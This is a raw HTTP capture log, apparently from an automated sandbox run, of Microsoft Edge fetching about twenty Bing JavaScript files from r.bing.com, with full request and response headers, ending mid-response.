akamai-grn: 0.c68f655f.1733306894.1af1321
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/mRnHl5xOMNMCkNGN3wISIz0ETug.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/mRnHl5xOMNMCkNGN3wISIz0ETug.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 22 Nov 2024 10:55:37 GMT
etag: 0x8DD0AE432F16745
content-length: 2290
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0OgEsUc5afhLPnQZRYj75Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 980edd47-f01e-0004-5908-3d1f12000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=223550
expires: Sat, 07 Dec 2024 00:14:04 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1322
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/X9zPQVZQzKFTYze2B2WNn1LJCS4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:32:07 GMT
etag: 0x8DCDC629CF7A282
content-length: 172
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: TLwZhqYro/p02/6N++ZW5g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c41191e3-201e-0006-43ea-181de8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=102711
expires: Thu, 05 Dec 2024 14:40:05 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af132c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/1u_LY-3P7BIagPGDkiUCRzkKi-0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/1u_LY-3P7BIagPGDkiUCRzkKi-0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 04 Nov 2024 04:21:32 GMT
etag: 0x8DCFC8829FC5441
content-length: 451
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Db92/67CtFF0jljsKqPMeQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 81247038-f01e-004b-0cee-2edb0a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.93777b5c.1730761562.a361727
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=85603
expires: Thu, 05 Dec 2024 09:54:57 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af132d
timing-allow-origin: *
GET

https://r.bing.com/rp/gGRPwribt8XPTQXpd2zkMD5o04w.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/gGRPwribt8XPTQXpd2zkMD5o04w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:47:16 GMT
etag: 0x8DCDC64BACB4BE8
content-type: text/javascript; charset=utf-8
content-md5: I/KVjWbAxZXfBeLqiVYi3w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a0015b35-401e-0034-3bef-164538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 542
cache-control: public, no-transform, max-age=171001
expires: Fri, 06 Dec 2024 09:38:15 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af132e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:56:41 GMT
etag: 0x8DD0492A397BB70
content-length: 1221
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: NQz+bEN0M74gpmwj/XRR0Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 20a5a5fa-801e-0000-7ebc-36ea90000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a5777b5c.1731629724.8a0b48d
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=341305
expires: Sun, 08 Dec 2024 08:56:39 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af132f
timing-allow-origin: *
GET

https://r.bing.com/rp/ArHyxbBQcE8YU5aazNfFDRsXU7E.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ArHyxbBQcE8YU5aazNfFDRsXU7E.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:25:57 GMT
etag: 0x8DCE8C21C48FDF3
akamai-grn: 0.bc901002.1731334608.299f224f
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: 9+Ds/dwwgvsKmdQ2CXRY4g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 07c3ab55-601e-0001-1d0a-1beb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 3750
vary: Accept-Encoding
cache-control: public, no-transform, max-age=213733
expires: Fri, 06 Dec 2024 21:30:27 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1330
timing-allow-origin: *
GET

https://r.bing.com/rp/RoFJpzeql5F0UwlxxhHctrDb1gI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/RoFJpzeql5F0UwlxxhHctrDb1gI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:30:35 GMT
etag: 0x8DCE8C2C1D3938C
content-length: 705
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: P+eOaBwLbPYjz8rXRd9vFw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d768b478-501e-0064-38de-1a5a30000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.3c221002.1731627744.1f74d8b7
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=123365
expires: Thu, 05 Dec 2024 20:24:19 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1331
timing-allow-origin: *
GET

https://r.bing.com/rp/EUVdjTinS37NjfSnARYo0K9VebI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/EUVdjTinS37NjfSnARYo0K9VebI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:02:51 GMT
etag: 0x8DCDC5E8650E75C
content-length: 526
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: OE66trga7eniXfEauP76xA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 631dc5ed-d01e-005c-3e47-161b69000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=111142
expires: Thu, 05 Dec 2024 17:00:36 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1332
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/63qjYW4S9DHDGHceAP26U3WNhl0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/63qjYW4S9DHDGHceAP26U3WNhl0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:43:16 GMT
etag: 0x8DCEC8872E2B292
content-length: 843
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cqUPJooYHTf09u2tbP05bw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 62949815-d01e-0018-6bcd-1ec705000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1731596048.82a53183
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=192205
expires: Fri, 06 Dec 2024 15:31:39 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1333
timing-allow-origin: *
GET

https://r.bing.com/rp/fWL2xzriHzWjhZXNxQ8Rm3CwUUU.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/fWL2xzriHzWjhZXNxQ8Rm3CwUUU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:46:10 GMT
etag: 0x8DCDC64934099EF
content-type: text/javascript; charset=utf-8
content-md5: BEMV1uDaLjBHWgMuX8vJ2g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 16a6194c-601e-0001-5b64-15eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 638
cache-control: public, no-transform, max-age=172564
expires: Fri, 06 Dec 2024 10:04:18 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1334
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/64ZSq206R4R8FyO8Y2Q8OdNSmMs.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/64ZSq206R4R8FyO8Y2Q8OdNSmMs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 25 Nov 2024 04:34:12 GMT
etag: 0x8DD0D0A698D06DA
content-length: 1283
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: M7IvEcfYE+WVXHAPUsbH+w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5d792076-601e-0028-2eac-3f9d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1732601422.b647f982
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=102829
expires: Thu, 05 Dec 2024 14:42:03 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1335
timing-allow-origin: *
GET

https://r.bing.com/rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:39:05 GMT
etag: 0x8DCEC87DD067940
akamai-grn: 0.99777b5c.1731448196.20efd3bd
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 658
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hmcBay1BgAVA4sBe4FzXJg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0f1608e3-701e-0078-7e5d-318227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=51964
expires: Thu, 05 Dec 2024 00:34:18 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1336
timing-allow-origin: *
GET

https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:44:16 GMT
etag: 0x8DCDC644F5E5FC5
content-length: 1076
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: oqLg+91b3FmpcS7e8iKMsQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 70e43bb9-e01e-0032-0c15-16b240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=179679
expires: Fri, 06 Dec 2024 12:02:53 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1337
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:08:44 GMT
etag: 0x8DCDC5F58808E4E
content-length: 468
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Hld4hrLTgdOY14/WVAnFqg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7add5af7-c01e-0048-2f6b-16d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=203132
expires: Fri, 06 Dec 2024 18:33:46 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1338
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/-2EVJNDwymhr08bVch00GwpjiDA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/-2EVJNDwymhr08bVch00GwpjiDA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:24:23 GMT
etag: 0x8DCEC85CF372642
content-length: 1043
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PkxdhPHrMXZXxfqaK/YI3w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6a67d116-b01e-0047-6073-1e35fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.ad777b5c.1731317035.1926a730
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=272545
expires: Sat, 07 Dec 2024 13:50:39 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1339
timing-allow-origin: *
GET

https://r.bing.com/rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:56:27 GMT
etag: 0x8DD04929B4990FB
content-length: 3910
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PtU28jG6dGjHkVaL3KCYNw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d0661e89-601e-0001-5ebb-36eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731612728.198d7eea
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=210405
expires: Fri, 06 Dec 2024 20:35:00 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306895.1af16dd
timing-allow-origin: *
GET

https://r.bing.com/rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 09 Oct 2024 06:47:11 GMT
etag: 0x8DCE82E33DB4289
content-length: 263
content-type: text/javascript; charset=utf-8
content-encoding: br
